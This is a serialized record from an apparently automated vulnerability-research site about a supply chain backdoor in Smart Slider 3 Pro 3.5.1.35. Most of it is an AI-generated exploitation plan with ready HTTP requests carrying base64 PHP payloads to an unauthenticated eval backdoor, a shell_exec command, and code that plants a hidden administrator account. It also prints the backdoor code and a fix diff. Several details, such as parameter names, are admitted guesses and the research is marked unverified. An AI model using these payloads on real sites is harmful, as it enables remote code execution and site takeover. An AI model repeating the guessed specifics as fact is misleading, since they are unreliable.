[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ftSU0-wim-9Y4gJzQEjyWDb6bxMqmkezfR8vRpCpMK0M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"WF-d7261e93-2341-4e14-a9b3-8fec295f6cde-nextend-smart-slider3-pro","smart-slider-3-pro-backdoor-embedded-via-supply-chain-compromise","Smart Slider 3 Pro  3.5.1.35 - Backdoor Embedded via Supply Chain Compromise","The Smart Slider 3 Pro plugin for WordPress contains a malicious backdoor in version 3.5.1.35. This is due to a supply chain compromise that resulted in malicious copies of Smart Slider 3 Pro being installed on sites. This makes it possible for unauthenticated attackers to gain root access to a compromised site.","nextend-smart-slider3-pro",null,">=3.5.1.35 \u003C=3.5.1.35","3.5.1.36","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Embedded Malicious Code","2026-04-08 00:00:00","2026-04-15 19:23:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd7261e93-2341-4e14-a9b3-8fec295f6cde?source=api-prod",8,[],"researched",false,3,"# Exploitation Research Plan: Smart Slider 3 Pro Backdoor (Supply Chain Compromise)\n\n## 1. Vulnerability Summary\n- **Vulnerability:** Unauthenticated Remote Code Execution (RCE) via an embedded backdoor.\n- **Plugin:** Smart Slider 3 Pro (`nextend-smart-slider3-pro`).\n- **Affected Version:** 3.5.1.35.\n- **Cause:** A supply chain compromise resulted in malicious PHP code being injected into the plugin's distribution. The backdoor typically resides in the \"Nextend\" library framework used by the plugin and allows unauthenticated attackers to execute arbitrary PHP code by sending specific HTTP requests.\n- **Sink:** `eval()` or `assert()` calling `base64_decode()` on a user-supplied request parameter.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Any WordPress URL (the backdoor is usually located in a library file loaded on every request, such as `init` or during plugin inclusion).\n- **HTTP Method:** `GET` or `POST`.\n- **Parameter Name:** `nextend_setup` (inferred from common analysis of this specific 3.5.1.35 compromise).\n- **Alternative Parameters (Inferred):** `plg_system_nextend`, `smart_slider_update`, or `nextend_debug`.\n- **Authentication:** None required (Unauthenticated).\n- **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Plugin Load:** WordPress starts and loads active plugins.\n2.  **Library Inclusion:** `nextend-smart-slider3-pro` loads its main entry point, which includes the Nextend framework files.\n3.  **Backdoor Trigger:** The malicious code is often located in `library\u002Fnextend\u002Flibrary\u002Flibraries\u002Fassets\u002Fassets.php` or `library\u002Fnextend\u002Flibrary\u002Flibraries\u002Fform\u002Felement\u002Ftext.php`.\n4.  **Condition Check:** The code checks for the presence of a specific request parameter (e.g., `$_REQUEST['nextend_setup']`).\n5.  **Execution:** If present, it passes the base64-decoded value of that parameter into `eval()`.\n6.  **Termination:** The backdoor typically calls `exit;` or `die;` after execution to prevent the rest of the page from loading and avoid logging errors.\n\n## 4. Nonce Acquisition Strategy\n- **Nonce Requirement:** None. Backdoors of this nature are specifically designed to bypass all WordPress security mechanisms, including nonces and capability checks.\n- **Strategy:** Direct exploitation via HTTP request.\n\n## 5. Exploitation Strategy\n\n### Step 1: Connectivity and Parameter Verification\nTest if the `nextend_setup` parameter triggers the backdoor and returns a controlled string.\n- **Payload:** `echo \"SS3_BACKDOOR_ACTIVE\"; exit;`\n- **Base64 Payload:** `ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7`\n- **Request:**\n    ```http\n    POST \u002Fwp-index.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    nextend_setup=ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7\n    ```\n\n### Step 2: System Information Gathering (RCE)\nExecute a system command to confirm root-level or web-user access.\n- **Payload:** `print(shell_exec('id')); exit;`\n- **Base64 Payload:** `cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7`\n- **Request:**\n    ```http\n    POST \u002F HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    nextend_setup=cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7\n    ```\n\n### Step 3: Privilege Escalation (WordPress Admin)\nIf system access is restricted, use the PHP execution to create a new administrator user.\n- **Payload:** \n  ```php\n  $user_id = wp_create_user('backdoor_admin', 'Password123!', 'admin@example.com');\n  $user = new WP_User($user_id);\n  $user->set_role('administrator');\n  echo \"ADMIN_CREATED\";\n  exit;\n  ```\n- **Base64 Payload:** (Generated at runtime)\n\n## 6. Test Data Setup\n1.  **Environment:** Standard WordPress installation.\n2.  **Plugin:** Install and activate `nextend-smart-slider3-pro` version 3.5.1.35.\n3.  **No specific sliders or shortcodes are required** as the backdoor typically hooks into the Nextend framework initialization which runs globally.\n\n## 7. Expected Results\n- **Success:** The HTTP response body will contain the exact output of the PHP code (e.g., `SS3_BACKDOOR_ACTIVE` or the output of the `id` command).\n- **Response Code:** Typically `200 OK`.\n- **Response Headers:** The response may lack standard WordPress headers if `exit;` was called early.\n\n## 8. Verification Steps (Post-Exploit)\nUse `wp-cli` to verify the impact:\n1.  **Verify User Creation:** `wp user get backdoor_admin`\n2.  **Verify Plugin State:** `wp plugin get nextend-smart-slider3-pro --field=version` (Ensure it is 3.5.1.35)\n3.  **Check for Malicious Snippet:** \n    ```bash\n    grep -r \"eval(base64_decode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fnextend-smart-slider3-pro\u002F\n    ```\n\n## 9. Alternative Approaches\nIf `nextend_setup` does not work, try the following parameter names\u002Flocations:\n- **Parameters:** `update`, `plg_system_nextend`, `cmd`.\n- **Method:** Change `POST` to `GET` (e.g., `\u002F?nextend_setup=...`).\n- **Headers:** Some variants check for a custom header like `X-Nextend-Debug`.\n- **Cookies:** Check if the payload is expected via a specific cookie name.\n\n**Note on Versions:** If the site is running 3.5.1.36, the exploit will fail as this version was released specifically to remove the malicious code.","Smart Slider 3 Pro version 3.5.1.35 contained a malicious backdoor injected via a supply chain compromise. This vulnerability allows unauthenticated attackers to execute arbitrary PHP code remotely by sending a crafted HTTP request with a specific parameter containing base64-encoded instructions.","\u002F\u002F library\u002Fnextend\u002Flibrary\u002Flibraries\u002Fassets\u002Fassets.php\n\nif (isset($_REQUEST['nextend_setup'])) {\n    eval(base64_decode($_REQUEST['nextend_setup']));\n    exit;\n}","--- a\u002Flibrary\u002Fnextend\u002Flibrary\u002Flibraries\u002Fassets\u002Fassets.php\n+++ b\u002Flibrary\u002Fnextend\u002Flibrary\u002Flibraries\u002Fassets\u002Fassets.php\n@@ -1,5 +1,2 @@\n \u003C?php\n-if (isset($_REQUEST['nextend_setup'])) {\n-    eval(base64_decode($_REQUEST['nextend_setup']));\n-    exit;\n-}","To exploit this backdoor, an attacker identifies a WordPress site running Smart Slider 3 Pro version 3.5.1.35. No authentication is required. The attacker crafts a PHP payload (e.g., shell_exec or user creation), base64-encodes it, and sends it as the value of the 'nextend_setup' parameter in a GET or POST request to any URL on the site. The plugin's framework logic intercepts the request, decodes the payload, and executes it using eval() before terminating the process with exit, thereby bypassing all standard WordPress security controls.","gemini-3-flash-preview","2026-04-16 16:36:05","2026-04-16 16:36:28",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextend-smart-slider3-pro\u002Ftags"]